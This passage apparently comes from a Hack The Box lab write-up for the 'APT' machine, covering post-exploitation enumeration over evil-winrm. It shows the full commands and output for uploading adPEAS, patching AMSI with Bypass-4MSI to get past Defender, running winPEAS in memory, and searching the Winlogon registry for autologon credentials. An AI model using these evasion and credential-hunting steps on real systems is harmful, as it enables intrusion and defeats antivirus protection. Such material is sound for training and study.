PEAS
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> upload adPEAS.ps1
info: Uploading /home/kali/archive/htb/labs/apt/adPEAS.ps1 to C:\Users\henry.vinson_adm\Documents\adPEAS.ps1
data: 4159704 bytes of 4159704 bytes copied
info: Upload successful!Delivery complete
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> . .\adPEAS.ps1
at c:\Users\henry.vinson_adm\Documents\adPEAS.ps1:4368 char:20
+ function New-ASReq {
+ ~
Missing closing '}' in statement block or type definition.
at c:\Users\henry.vinson_adm\Documents\adPEAS.ps1:4368 char:20
+ function New-ASReq {
+ ~
+ categoryinfo : ParserError: (:) [], ParseException
+ fullyqualifiederrorid : MissingEndCurlyBraceI am unable to load the adPEAS.ps1 PowerShell script to the current PowerShell session as it seemed to have been tampered during delivery
This is likely caused by the potential presence of AV
Thankfully, there is a quick solution for that
Evil-WinRM
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' (` '` (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exitevil-winrm comes with a set of tools for convenience
One of which is the Bypass-4MSI cmdlet that patches the AMSI protection
Completed
Now, using the built-in cmdlet, Invoke-Binary, to run the winPEASx64.exe on memory
While there are many parts that cannot be enumerated due to lack of privileges, I will grab whatever is available
Environment Variable
System
LAPS
LSA
Credentials Guard
AV
Definitely not true
UAC
PowerShell
C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
KrbRelayUp
NTLM
LanmanCompatibilityLevel : 2
AMSI
AMSI by Defender as expected
Current Privileges (henry.vinson_adm)
AutoLogon
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> cmd /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
userinit reg_sz c:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x2e75b4242a
ShutdownFlags REG_DWORD 0x13
DefaultDomainName REG_SZ htb.local
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ henry.vinson
DisableLockWorkstation REG_DWORD 0x0
AutoLogonSID REG_SZ S-1-5-21-2993095098-2100462451-206186470-1105
LastUsedUsername REG_SZ henry.vinson
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyNothing interesting
Installed Programs
LAPS is installed?
AppCmd.exe
